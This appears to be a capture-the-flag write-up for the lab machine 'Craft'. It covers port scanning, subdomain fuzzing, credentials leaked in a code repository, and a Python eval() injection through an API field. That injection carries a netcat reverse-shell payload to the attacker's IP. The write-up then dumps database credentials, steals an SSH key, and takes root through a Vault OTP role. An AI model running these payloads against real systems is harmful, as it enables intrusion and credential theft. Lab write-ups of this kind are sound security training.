nmap -p- --min-rate 10000 10.10.10.110 -Pn 
After detection of open ports, let's do greater nmap scan here.
nmap -A -sC -sV -p22,443,6022 10.10.10.110 -Pn
While we browse this ip address, we see that HTTP record resolved into craft.htb.
Let's add this into /etc/hosts file for resolving purposes.
Let's do Subdomain Enumeration.
wfuzz -u "https://10.10.10.110" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.craft.htb" --hh 3779
Let's add these records into /etc/hosts file, also.
Once I open api.craft.htb, I can see Swagger Documentation.
While we want to authenticate ourselves to /auth/login endpoint, we are asked to enter username and password.
There are two links at the top right that lead to new subdomains: https://api.craft.htb/api/ and https://gogs.craft.htb/
While I open gogs.craft.htb which is used for Code Repository.
While I look at last commits, I can see hard-coded credentials.
dinesh: 4aUh0A8PbVJxgd
Let's try to authenticate into API via this credentials via curl request.
curl -k -X GET "https://dinesh:4aUh0A8PbVJxgd@api.craft.htb/api/auth/login" -H "accept: application/json"
We just need this JWT token to make requests to other endpoints of API.
Again, I enumerate API documentation which gets user input which means I can inject something to here.
Let's analyze code repository to find anything related to this endpoint.
I find related script and POST request method which eval() dangerous method is used here.
As we see eval() method, we can inject some Python commands including call os library and run system commands which leads to Code Injection vulnerability.
So we need to inject malicious command to abv parameter which will be used in eval() method.
First, we need to get JWT token as below and write this output into environment variable.
export TOKEN=$(curl -s -k -X GET "https://dinesh:4aUh0A8PbVJxgd@api.craft.htb/api/auth/login" -H "accept: application/json" | cut -d '"' -f4)
Now, we can send request to send Code Injection by using our JWT token.
curl -X POST "https://api.craft.htb/api/brew/" -H "accept: application/json" -H "Content-Type: application/json" -d "{
\"id\": 0,
\"brewer\": \"dr4ks\",
\"name\": \"beer\",
\"style\": \"bad\",
\"abv\": \"__import__('os').system('ping -c 10.10.14.2')\"}" -k -H "X-CRAFT-API-TOKEN: $TOKEN"
I can see results from tcpdump -i tun0.
Let's change Command injection to reverse shell payload.
curl -X POST "https://api.craft.htb/api/brew/" -H "accept: application/json" -H "Content-Type: application/json" -d "{
\"id\": 0,
\"brewer\": \"dr4ks\",
\"name\": \"beer\",
\"style\": \"bad\",
\"abv\": \"__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1337 >/tmp/f')\"}" -k -H "X-CRAFT-API-TOKEN: $TOKEN"
Hola, I got reverse shell from port 1337.
Let's make interactive shell.
python3 -c 'import pty; pty.spawn("/bin/sh")'
Ctrl+Z
stty raw -echo;fg
export TERM=xterm
export SHELL=bash
Most probably that's container, anyway, we need to make enumeration to find interesting stuff.
From /opt/app/craft_api directory, I find settings.py file which contain sensitive credentials.
craft: qLGockJ6G2J75O
Then I find dbtest.py script on /opt/app directory, let's read this.
This is just used to get informaiton from brew table.
Let's modify this script to get full execution of mysql database.
import sys
sql = sys.argv[1]
result = cursor.fetchall()
Let's execute this script.
python dbtest.py 'SELECT user()'
I find table user which contains sensitive credentials.
python dbtest.py 'SELECT * FROM user;'
Let's look at grabbed credentials.
dinesh: 4aUh0A8PbVJxgd
ebachman: llJ77D8QFkLPQB
gilfoyle: ZEU3N8WNM2rh4TI check this credentials in so many places, but it gilfoyle creds worked for Gogs which is Code Repository.
I find private repository called craft-infra, let's access here.
Here, I find private key file (id_rsa).
Let's take this and change privileges to login into machine.
chmod 600 id_rsa
ssh -i id_rsa gilfoyle@craft.htbNote: Passphrase is the same with password.
user.txt
For Privilege Escalation, I just look at processes via ps aux command and find vault.
As you see user of vault process is root user.
I looked at Documentation of Vault.
Let's start enumeration.
vault token lookup
vault secrets list
I look at roles as below.
vault read ssh/roles/root_otp
Let's try to connect via vault ssh cmdlet.
vault ssh -mode=otp -role=root_otp root@127.0.0.1root.txt
